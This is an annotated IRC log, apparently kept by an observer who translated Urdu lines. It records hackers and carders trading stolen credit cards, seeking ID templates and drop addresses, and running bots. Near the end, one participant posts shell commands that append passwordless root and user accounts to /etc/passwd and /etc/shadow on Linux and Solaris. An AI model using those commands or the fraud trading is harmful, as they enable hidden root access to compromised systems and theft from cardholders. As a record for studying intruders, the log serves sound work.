      :J4n3 :and yeah example.org  and com net all available :p
      :J4n3 :T1 i think
      :D1ck :kewl
      :D1ck :get me please
      :D1ck :oh
      :J4n3 :yaar CC :(
      :J4n3 :no CC right now 
      :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ?
      
      (Note:: here's where they hatch the idea of stealing CCs)
      
      :D1ck :yep
      :D1ck :oki
      :D1ck : welp why dont we all hang in 
      :D1ck :it was my channel and i think ti still is
      :J4n3 :abay yaar sub fraud hotha hai wahan par
      
      hey dude, a lot of fraud goes on there
      
      :J4n3 :their CC's do not work
      :D1ck :hehe
      :J4n3 :bauth try kiya hai undernet and effnet par
      
      tried a lot on undernet and effnet
      
      :D1ck :k
      :D1ck :heh k
      :D1ck :<shellad:#shellz> DIGITALINET offers quality web hosting staring at 6$ a
      :D1ck :                  month. Signup for webhosting with digitalinet and get your
      :D1ck :                  domain for 11$ a year
      :D1ck :                  information.
      :D1ck :i`ll buy 2 legit domains there
      :J4n3 :haha i had a shell from there
      :D1ck :kewl
      :J4n3 :they closed shell service now 
      :J4n3 :adult web hosting :p
      :D1ck :lol
      :J4n3 :service achee thee buree nahin thee
      
      the service was good, not bad at all
      
      :D1ck :haha
      :J4n3 :oye sex time
      :J4n3 :brb
      :J4n3 :br
      :J4n3 :bbl
      :J4n3 :shayed so gaya
      
      seems like he's gone to sleep
      
      :D1ck :ahahahha
      :J4n3 :hehe
      :J4n3 :g0ne
      :D1ck :.join 
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :^w1nX^ :cc
      :^w1nX^ :cc
      :^w1nX^ :sleepin chann
      :^w1nX^ :trade
      :^w1nX^ :sleepin chann
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :trade
      :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :nirvana19 :e cinevA de aici si pe rocarding?
      
      (Note:: definitely not urdu here)
      
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :Bl4ck_ :not again
      :Bl4ck_ :-up
      :nirvana19 :I buy stuff
      :SLaZz :who wants to trade cc's ??
      :nirvana19 :gfnbfg
      :nirvana19 :someone from romania?
      :savantul :yes
      :_Mephisto :multi
      :_Mephisto ::)
      :nirvana19 :aveti ceva marfa?
      
      (Note:: ??)
      
      :nirvana19 :cumpar
      :_CardMan_ :re ppl
      :Bl4ck_ :arrrrrrrrrrrrrrrrr
      :Bl4ck_ :-up
      :_CardMan_ :what is new ?
      :Bl4ck_ :shitttttttttttttt
      :_CardMan_ :stupid bots
      :Bl4ck_ :-up
      :Bl4ck_ :-up
      :_CardMan_ :this is fun....
      :Bl4ck_ :Omblad0n up
      :Bl4ck_ :Omblad0n op
      :Bl4ck_ ::>>
      :Bl4ck_ :arrrrrr
      :_CardMan_ :Bl4ck_....do u know what u r doing ?
      :Bl4ck_ :dunoo
      :_CardMan_ :i saw....
      :_CardMan_ :so ... any romanian people here ?
      :bug____ :ops
      :_CardMan_ :bug____...whats up ?
      :savantul :lots
      :bug____ :nimic man
      :_CardMan_ :ok...
      :bug____ :I need cc
      :bug____ :lol
      :_Mephisto :me too
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede....
      
      (Note:: ??)
      
      :nirvana19 :da o gramada de romanian pepole pe aici
      
      (Note:: ??)
      
      :bug____ :1 cc
      :bug____ :1
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :_CardMan_ :care esti pe kappa (IP: 192.168.254.95
      :_CardMan_ :DNS: dialup-56k-95.example.xx
      :_CardMan_ :si dai cu scanarea ?
      :nirvana19 :de unde pot sa fac rost de Legion 2.1
      :_Mephisto :de la mine
      :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ?
      :nirvana19 :poti sa mi-l dai?
      :dlotos33 :Is there any Romania friends?
      :bug____ :nope
      :dlotos33 :Is there any Romania friends?
      :_CardMan_ :a lots 
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :v|Adu :re 
      :v|Adu ::)
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :v|Adu :anybody need a drop place ?
      :nirvana19 :de unde esti ma vladule?
      :_CardMan_ :v|Adu.... lasa-te de meserie ....
      :v|Adu ::)))))))
      :v|Adu :cardman 
      :v|Adu ::)
      :v|Adu :hahahahah
      :v|Adu ::)
      :_CardMan_ :suck it 
      
      (Note:: ?? - all this is either romanian or some other language)
      
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :nirvana19 :sorry
      :Co0lWoRx :ok
      :Co0lWoRx :np
      :xroach :anybody have any driver license template ? 
      :xroach :anybody have any driver license templates ? 
      :bug____ :u can save my ass with  1 cc
      :xroach :actually any good templates would be nice
      :bug____ :I got some sites
      :v|Adu :re 
      :Co0lWoRks :ACTION any1 wanna earn +v in 
      :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now
      :Co0lWoRks :ill bbl, since no one wants anything here
      :Bl4ck_ :-up
      :Bl4ck_ :?
      :Bl4ck_ :soory
      :Bl4ck_ :I`ll go
      :dlotos33 :anyone have CC?
      :s1z1f :yes
      :xroach :anyone have or know where i could get license templates or any templates for mag cards ? 
      :s1z1f :do enyone have cc?
      :dlotos33 :Does any one speak germany?
      :_CardMan_ :do not think so ...
      :2red :i speak some german
      :2red :why?
      :dlotos33 :What means "ORT" at GERMANY?
      :2red :city?
      :dlotos33 :thank you ,my friend
      :MaTiX_00 :hello
      :MaTiX_00 :anyone got a proxy for me to use?
      :dlotos33 :yes
      :SpRiTe^^^ :HI
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx
      :kurky :Any GOOOOOOOD carders here? msg me
      :kurky :Anyone here got a UK cc??? Msg me
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :][VaMpIrE :hi
      :][VaMpIrE :wanna trade?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :_CardMan_ :m4r1n4ru...salve mah 
      :m4r1n4ru :-op
      :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too
      :s1z1f :do enybody have cc?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :s1z1f :do enybody have cc?
      :[SK]Kane :care aveti un proxy bun de www?
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :SpRiTe^^^ :H
      :SpRiTe^^^ :ok
      :m4r1n4ru :-op
      :s1z1f :do enybody have cc?
      :s1z1f :do enybody have cc?
      :dariuss :am yo 1000
      :s1z1f :do enybody have cc?
      :natedogg :i do..
      :s1z1f :pls give it to me
      :natedogg :trade...
      :natedogg :mgs me..
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :natedogg :sizif ---------------banned#no more trade kind.....
      :s1z1f :do enybody have cc?
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :pimpg :yeah
      :pimpg :if you would like one you have to send me one first
      :pimpg :then if it approves
      :s1z1f :ok
      :pimpg :i will send one to you
      :pimpg :sound good
      :pimpg :pm me if you would like me 2
      :D1ck :Tota1KaaS join #delusion
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :dariuss :Bl4ck_-))
      :Bl4ck_ :se man
      :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined 
      :s1z1f :*** Retrieving 
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<s1z1f> pls give it to me
      :s1z1f :*** Retrieving 
      :s1z1f :*** natedogg has quit IRC (Signed off)
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<pimpg> yeah
      :s1z1f :<pimpg> if you would like one you have to send me one first
      :s1z1f :<pimpg> then if it approves
      :Ghici :re ppl
      :pimpg :hello
      :pimpg :would anyone like to trade, i dont go first
      :D1ck :D4v3
      :D1ck :WHEN BACK MSG ME
      :s1z1f :do enybody have cc?
      :dariuss :ACTION c ya
      :m4r1n4ru :Away
      :m4r1n4ru :I have Returned.
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :Bon_Jovi :m4r1n4ru 
      :s1z1f :do enybody have cc?
      :Bon_Jovi :yep
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :D1ck :hey J4n3
      :J4n3 :what's new :p ?
      :D1ck :server
      :D1ck :buying
      :D1ck :but what did j0e say
      :D1ck :which is good one?
      :J4n3 :buying ? confirmed ?
      :D1ck :i got 10 domains
      
      (Note:: at this point i guess they have closed the deal with the previous CCs)
      
      :D1ck ::P
      :D1ck :freind bought them
      :D1ck :hreh
      :D1ck :yup
      :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay
      
      he himself doesnt know really, he just tried example and it didnt look all right to him
      
      :D1ck :example.net sux?
      :D1ck :oh
      :J4n3 :great  
      :D1ck :(@J4n3): great
      :D1ck :?
      :J4n3 :haha u said friend already bought it ?
      :D1ck :domains
      :D1ck ::)
      :J4n3 :oh
      :J4n3 :but from where u planning to buy ?
      :D1ck :kuch samhaj nahi aa rahi
      
      cant understand anything
      
      :D1ck :where should i buy
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :J4n3 :2,828 ?
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :yeah
      :D1ck :per year
      :D1ck ::(?
      :D1ck :or :?
      :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd
      :D1ck ::)?
      :m4r1n4ru :Away
      :D1ck :but
      :D1ck :that was one month
      :D1ck :remmeber?
      :J4n3 :hmm
      :J4n3 :u mean thats all for one year ?
      :J4n3 :and u gonna pay for it ?
      :D1ck :tell me
      :D1ck :what should i do?
      :D1ck :i`m confewsed
      
      (Note:: you mean "confused"... kiddie)
      
      :J4n3 :yaar aaj raath tak wait karlo
      
      dude, wait till tonight
      
      :J4n3 :let me ask some more ppl
      :D1ck :oki
      :J4n3 :teeek haina ?
      
      it's ok with you, right?
      
      :J4n3 :i'll ask miller too
      :D1ck :oki
      :D1ck :ok
      :D1ck :my budget is 170-200/month
      :J4n3 :hmm k
      :D1ck :>Domain Name 1....: example.com
      :D1ck :>Domain Name 2....: example.com
      :D1ck :>Domain Name 3....: example.com
      :D1ck :>Domain Name 4....: example.com
      :D1ck :>Domain Name 5....: example.com
      :D1ck :>Domain Name 6....: example.com
      :D1ck :>Domain Name 7....: example.com
      :D1ck :>Domain Name 8....: example.com
      :D1ck :>Domain Name 9....: example.com
      :D1ck :>Domain Name 10...: example.com
      :D1ck :>Total............: $649.50
      :J4n3 :oh already registered ?
      :D1ck :yup
      :J4n3 :how many years ?
      :D1ck :1
      :J4n3 :thats expensive
      :J4n3 :wait
      :D1ck :who cares
      :D1ck :its cared
      :J4n3 :let me check
      :J4n3 :oh
      :J4n3 :then its ok but wait
      :D1ck :oki
      :D1ck :(Sephirot): I need help , SOme one can help me
      :J4n3 :heh
      :D1ck :=p
      :J4n3 :oye
      :D1ck :?
      :J4n3 :u could got those 10 domain for 2 years at 300 $   and for 5 years at 750 $
      :D1ck :kewl
      :D1ck :from where?
      :J4n3 :dotster
      :D1ck :dotster.com
      :D1ck :?
      :J4n3 :1 year: $15  2 year: $30 
      :J4n3 :5 year: $75 10 year: $150 
      :J4n3 ::)
      :J4n3 :yeah
      :D1ck :cool
      :D1ck ::P
      :J4n3 :we'll get more from there
      :D1ck :oki
      :D1ck :;)
      :D1ck :yaar
      
      dude
      
      :D1ck :i want the server
      :D1ck :b4d
      :D1ck :kuch samhaj nahin aa rahi
      
      cant understand anything
      
      :J4n3 :haha jald baazi math karo 
      
      haha, dont make haste
      
      :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts?
      :m4r1n4ru :Away
      :J4n3 :coz u going to pay from ur pocket
      :D1ck :lol oki
      :J4n3 :zara ache thara maaloom karnay do
      
      let's locate some good chap
      
      :D1ck :ok;)
      :J4n3 :page design karnay ka masla nahi wo hojayega dont worry
      
      dont worry about the page design problem, it shall be done
      
      :D1ck :oki kewl
      :D1ck ::)
      :D1ck :oye
      :J4n3 :i'm gonna open a cosmetics shop at tariq road :p
      :D1ck :1pani nay apna server liya tha or rent?
      
      has j0e bought the server or rented it?
      
      (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they
      always refer to)
      
      :J4n3 :yea ?
      :J4n3 :liya tha
      
      had bought it
      
      :D1ck :kewl hehe
      :D1ck ::/
      :D1ck ::/
      :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say
      
      if you say so, i can tell you j0e's deal
      
      :D1ck :oh
      :J4n3 :usay kahonga thumain call karday
      
      i will ask him to call you
      
      :J4n3 :ok ?
      :D1ck :ok
      :D1ck :sure
      :D1ck ::)
      :D1ck :but after 9
      :D1ck :but after 9 pm
      :J4n3 :teeek hai phir khud hee pooch lena sub kuch
      
      ok then just ask him everything yourself
      
      :D1ck :coz i`ll be sleeping
      :J4n3 :hmm ok
      :D1ck :k;/
      :D1ck :;/
      :J4n3 ::)
      :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink*
      
      bachiyan = chicks
      
      :D1ck :lol
      :D1ck :hahahaha
      :J4n3 :hehe yeah
      :J4n3 :have u seen that new building dolmen mall ?
      :D1ck ::P
      :D1ck :nop
      :m4r1n4ru :Away
      :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi
      
      hmmm then take a look at it, it's cool and most beautiful market in karachi
      
      :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :(
      
      dude, give me a cool host, such that if we run psybnc on it, it doesnt crash.
      
      (Note:: i am having problems with some urdu words, but the word-by-word translation for
      the rest of it is:
      
      meray = mine
      main = in
      nahi = doesnt
      kartha = happens
      
      the last part is.."make command doesnt work in this")
      
      :D1ck ::))
      :D1ck :oh
      :D1ck :i will send u psybnc-compiled
      :D1ck :when i boot
      :D1ck ::)
      :J4n3 :oh then its kewl :)
      :J4n3 :tight
      :J4n3 :for sparc na ?
      :D1ck :yeps
      :J4n3 :great waiting ...
      :D1ck :abey abhi ruk heheheh
      
      hey wait for now heheheh
      
      :D1ck :i am tlking to the person for col
      :D1ck ::P
      :D1ck ::pPpp
      :J4n3 :haha ruka huwa hon jub boot karo tho daydena hehe
      
      haha, i am waiting. when you boot then give it up hehe
      
      :D1ck :*** Joins: tOpDaWgGy (KoRn@spc-isp-tor-58-18-419.example.xx)
      :D1ck :(tOpDaWgGy): dAwGgGYY
      :D1ck :(tOpDaWgGy): chinii
      :D1ck :(tOpDaWgGy): jApAniIii
      :D1ck :(@D1ck): hEYyYYyYy
      :D1ck :(@D1ck): dOgYY
      :D1ck :hehehe
      :J4n3 :hehehe
      :D1ck ::)
      :m4r1n4ru :Away
      :D1ck :oye
      :D1ck :read
      :D1ck :http://www.example.net/Contracts/CIT-Colocation%20Agreement.html
      :D1ck :tell me i it have some clawa
      :D1ck :tell me i it have some claws
      :J4n3 :wait
      :D1ck :k
      :J4n3 :errror araha hai
      
      there's an error
      
      :D1ck :works for me
      :J4n3 :hmm nope not working let me try on netscape
      :D1ck :k
      :D1ck :(tOpDaWgGy): shAe.. dAwG bhai
      :J4n3 :Plan A:  20 gigs/month [64kbps avg.], * up to 30 IP addresses  ($150.00
      :J4n3 :      per month)
      :D1ck :is ko doggy kay ilawa
      
      this one as an alternative to doggy
      
      :J4n3 :thats what u want to buy ?
      :D1ck :nope
      :D1ck :40 gig
      :D1ck :256 ips
      :J4n3 :Plan B:  40 gigs/month [128kbps avg], * up to 62 IP addresses  ($250.00
      :J4n3 :      per month)
      :J4n3 :its 62 in 40 gigs
      :D1ck :yep but he sed he will allow 256 if not needed
      :D1ck :needded
      :J4n3 :oh then its okay package is kool
      :D1ck :kewl
      :J4n3 :.msg G_u_Y__  abay oye chichoray mmoooon band kar apna 
      
      hey you squirt, shut your mouth
      
      PRIVMSG G_u_Y__ :abay oye chichoray mmoooon band kar apna 
      
      hey you squirt, shut your mouth
      
      :D1ck :best firwalling and dos protection in town
      :D1ck :lol
      :J4n3 :hmm kewl
      :J4n3 :oye add my this host to bots plz :)
      :m4r1n4ru :Away
      :D1ck :sure
      :D1ck :whats yure ip
      :D1ck :/whois J4n3
      :J4n3 :*
      :D1ck :onghome.com
      :D1ck :oki
      :D1ck :.host add J4n3 *
      :D1ck :brb
      :J4n3 :thanx :)
      :m4r1n4ru :Away
      :J4n3 :.join #karachi
      :m0sTwAnTdpinG
      :G_u_Y__
      
      you and i will get along well
      
      :J4n3 :.msg #karachi GUY ullooo kay pattay moon band rakko apna
      
      you stupid chaps, keep your mouth shut
      
      :sawera
      
      hey ask those who are about to die what their last wish is
      
      :G_u_Y__
      :J4n3 :oops
      :J4n3 : ?
      :J4n3 :say A?
      :G_u_Y__
      
      dearest
      
      :J4n3 :.say #karachi GUY Ullooo kay pattay mooon band rakko apna :p
      
      you stupid chaps, keep your mouth shut
      
      :J4n3 :.part #karachi
      :m4r1n4ru :Away
      :D1ck :J4n3
      :D1ck :my dadi's bro died today, so my dad is off to lahore
      :D1ck :shit
      :D1ck :ab this kaam will latkofy
      
      now this work will be left hanging
      
      :J4n3 :oh
      :J4n3 :Inna lillaaye wa inna ilayae raajioon
      
      (Note:: some prayer to allah it seems)
      
      :J4n3 :very sorry
      :D1ck ::p
      :D1ck :yep he was 85, this is life, ppl come and go
      :D1ck :hehe
      :D1ck :its ok
      :D1ck :;)
      :J4n3 :oh
      :D1ck ::)
      :J4n3 :phir tho time tha jaanay ka unkay
      
      then it was time for him to go
      
      :J4n3 :i thought he was young
      :J4n3 ::p
      :D1ck :nop
      :D1ck :hehe
      :J4n3 :hehe
      :D1ck ::)
      :D1ck :oye
      :D1ck :what i say is
      :D1ck :hm
      :J4n3 :is ?
      :D1ck :chalo time mil gaye ga
      
      come we shall get the time
      
      :D1ck :now we can investiagte
      :J4n3 :yeah yeah
      :J4n3 ::)
      :D1ck :(g|nger`): well
      :D1ck :(g|nger`): i have like 20
      :D1ck :(g|nger`): example.org example.org example.com example.net example.com example.com example.org will-fuck-up-example.com example.com example.com example.com example.com example.com
      :D1ck :(g|nger`): plus others
      :D1ck :(g|nger`): you can have whatever vhosts you want
      :D1ck :kewl?
      :m4r1n4ru :Away
      :J4n3 :yeah kewl
      :D1ck :PHAT6
      :D1ck :;pp
      :J4n3 :if we have domains, we can have vhost of whatever we like
      :D1ck :yaar is it possibl that u can help me with wrebpage :P?
      :D1ck :i cant do alone, coz i have 0-webpage skilzl
      :D1ck :hehe
      :J4n3 :yeah yeah i'm with u always
      :J4n3 ::)
      :D1ck :iknowheh
      :J4n3 :dont feel ur self alone
      :D1ck :kool:)
      :D1ck :kleet
      :J4n3 ::)
      :D1ck :aur sunao
      
      so what else is new?
      
      :D1ck :what haWt
      :J4n3 :nutthin hot naveed nay chars maanga hai hehe
      
      nothing's hot. naveed has asked for some marijuana (chars = marijuana/pot)
      
      :D1ck :HAHAHAHAAHAHA
      :J4n3 :hehehe yeah
      :D1ck :woh charas peeta hai? apni girlfreind ka chakroon may juis nay is ko ghaas nahindali?
      
      does he do marijuana? (Note:: something about his girlfriend being involved in marijuana too)
      
      :D1ck :ROFL
      :J4n3 :lol 
      :D1ck ::)
      :D1ck ::)
      :J4n3 :hah chars tho shroo say peetha hai pehlay bee main day chuka hon usko
      
      hah. he was having marijuana since the beginning. earlier i had given him some too
      
      :D1ck :lol
      :D1ck :oki
      :D1ck :tum charas latay hoon?
      
      do you also do marijuana?
      
      :[Agent] :anyone wants to have proxy list, cc list, RH bash shell eggable..msg me if ur serious
      :J4n3 :haan , i have many relations with drug mafia hehe
      :D1ck :(if answer=yes) { d4v3== "should not take" else printf ("its ok\n");
      :D1ck :lol
      :Flapjack- :Anyone trade cc for bnc? Msg me
      :D1ck :char drugs[80]'
      :D1ck :char drugs[80];
      :J4n3 :hehe
      :J4n3 :lol
      :D1ck ::)
      :J4n3 :main bee peetha hon kabee kabee mood hoay par
      
      i have some depends on the mood
      
      :D1ck :oh
      :D1ck :(@|S4n4m|): wasalamz
      
      salutations
      
      :D1ck :(sawera): w/salam
      :D1ck :chix?
      :D1ck :bawt?
      :J4n3 :yup |S4n4m| = mine
      :D1ck :hahaa
      :D1ck :all-chicks = yure
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :J4n3 :<|S4n4m|> key tum ko kuch kam karna hay
      
      hey do you want to do some work?
      
      :J4n3 :> thum falsafi kub say ban gayee ?
      
      since when did you become a philosopher?
      
      :J4n3 :<|S4n4m|> jab sey tum sey bat ki hay
      
      since the time i've started talking to you
      
      :J4n3 :aaaaahhhhhhhhhh
      :D1ck :hhaha
      :D1ck ::P
      :D1ck :mv logs.txt bhabi.txt
      
      (Note:: bhabi = sister-in-law)
      
      :J4n3 :lol
      :J4n3 :oye
      :D1ck :<bhab> cat bhabi.txt
      :D1ck :<bhabi> I WILL KILL U D4v3
      :D1ck :?
      :J4n3 :muhahahahahhahahahahhhaa
      :J4n3 :HHAHAHAHAHAHAH
      :D1ck ::)
      :J4n3 :heheheheh
      :J4n3 :ROFLMAO
      :D1ck :(:
      :J4n3 :ROFLMAO
      :D1ck :=P
      :m4r1n4ru :Away
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :m4r1n4ru :Away
      :Dariox :who trade cc
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :[Agent] :anyone can card me a laptop?
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :telnet- :anyone can card me a shell or web domain....pls answer to me
      :m4r1n4ru :Away
      :[Agent] :wanna trade
      
      Romanian:
      
      :|S4n4m| :tum aisey hi bolna
      
      Just keep on saying like this
      
      :|S4n4m| :karna kuch nahi
      
      dont do anything
      
      :J4n3 :ye baath hai ?
      
      is that the deal?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :yeh bat hay
      
      that is the deal
      
      :J4n3 :ping bot aaraha hai
      
      the ping bot is coming
      
      :|S4n4m| :instooooooooooooooooooooo
      :|S4n4m| ::)
      :|S4n4m| :karachi mey aooo
      
      come to karachi
      
      :J4n3 :ok bot aagaya
      
      ok the bot is here
      
      :J4n3 :d3s|r3 hai uska nick
      
      its nick is d3s|r3
      
      :J4n3 :ab main channel par tyep karo ping me
      
      now type in the main channel in ping (Note:: dont know what it translates to)
      
      :J4n3 :<d3s|r3> PiNG THiNGiE - hiall's ping reply took 13 seconds
      :|S4n4m| :hmmm
      :|S4n4m| :tahnks
      :J4n3 :dekha ?
      
      saw that?
      
      :J4n3 :ab khush ?
      
      now are you happy?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :kush
      
      happy
      
      :J4n3 :bus thum khush raho :)
      
      that's all ... keep staying happy :)
      
      :|S4n4m| :wah
      
      cool
      
      :|S4n4m| :kya bat hay app ki
      
      what shall i say about you
      
      :|S4n4m| :wasey
      :|S4n4m| :mey ney ek bandha rakh leeya hay
      
      i have kept one system for myself
      
      :|S4n4m| :ping key leyya
      
      for pinging
      
      :J4n3 :thumara bandaa 24 hour nahin betay gas
      
      your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu)
      
      :J4n3 :mera bot hoga
      
      my bot will
      
      :|S4n4m| :hmmmmmmmmmm
      :|S4n4m| :instoo
      :|S4n4m| :zara 5 min key leyee
      
      for a little bit... 5 mins
      
      :|S4n4m| :karachi channel per
      
      on karachi channel
      
      :|S4n4m| :flori ka interview ley loo
      
      take flori's interview
      
      :|S4n4m| :mey ney appoint kya hay
      
      i have appointed (him/her?)
      
      :J4n3 :hahaha nahin thum khud hee laylo
      
      yes yes, but take it yourself (the interview)
      
      :|S4n4m| :kyon
      
      why?
      
      :|S4n4m| :tum yahn key op hoo
      
      you are the op here
      
      :|S4n4m| :admintration mey hoo
      
      i am in administration
      
      :J4n3 :op thum oh main co-founder hon
      
      you are the op, i am the co-founder
      
      :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil
      
      ohhh.... she stole my heart
      
      :|S4n4m| :han wohi hii
      
      yes, her
      
      :|S4n4m| :hello
      :|S4n4m| :kya hoa
      
      what happened?
      
      :J4n3 :wait
      :J4n3 :.up
      :J4n3 :.op netra
      :J4n3 :.op Ott0
      :Dew :Hey J4n3 u there ?
      :J4n3 :.host add J4n3 *
      :J4n3 :.up
      :J4n3 :OngHome esay $uptime
      :D1ck :J4n3 
      :D1ck :i`m getting my own server;)
      :D1ck :J4n3 
      :D1ck :J4n3 
      :J4n3 :D1ck
      :J4n3 :i'm here
      :D1ck :hehe
      :D1ck :J4n3 
      :J4n3 :hehe
      :J4n3 :D1ck
      :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u
      :D1ck ::P
      :D1ck :i lost mine
      :J4n3 :wait
      :D1ck :and i dont wana make again
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "ro::99999::::::" >> /etc/shadow;
      :J4n3 :echo "r::99999::::::" >> /etc/shadow;
      :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :k
      :J4n3 ::p
      :D1ck :and suhn
      :D1ck :?
      :D1ck :sun
      :D1ck :?
      :J4n3 :wait
      :D1ck :gimme sun tew
      :D1ck :k
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "re::6445::::::" >> /etc/shadow;
      :J4n3 :echo "r::10891::::::" >> /etc/shadow;
      :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :thx
      :J4n3 :np :p
      :D1ck :oye
      :D1ck :me getting a box
      :D1ck :T+3
      :D1ck :T3
      :J4n3 :wow
      :J4n3 :kewl
      :D1ck :where should i get?
      :D1ck :where is j0e getting
      :D1ck :d4v3 i want the folling domains
      :J4n3 :folling ?
      
      (Note:: misspelt "following")
      
      :D1ck example.org
      :J4n3 :j0e say contact nahi huwa called him 2 times
      
      j0e said there has been no contact ... called him 2 times
      
      :D1ck :wetcunts.net
      :J4n3 :example hmm
      :J4n3 :mil jayega agar register nahi huwa hai tho
      
      we will get it if it has not been registered
      
      :D1ck :undefined.net
      :D1ck :and kewl ones
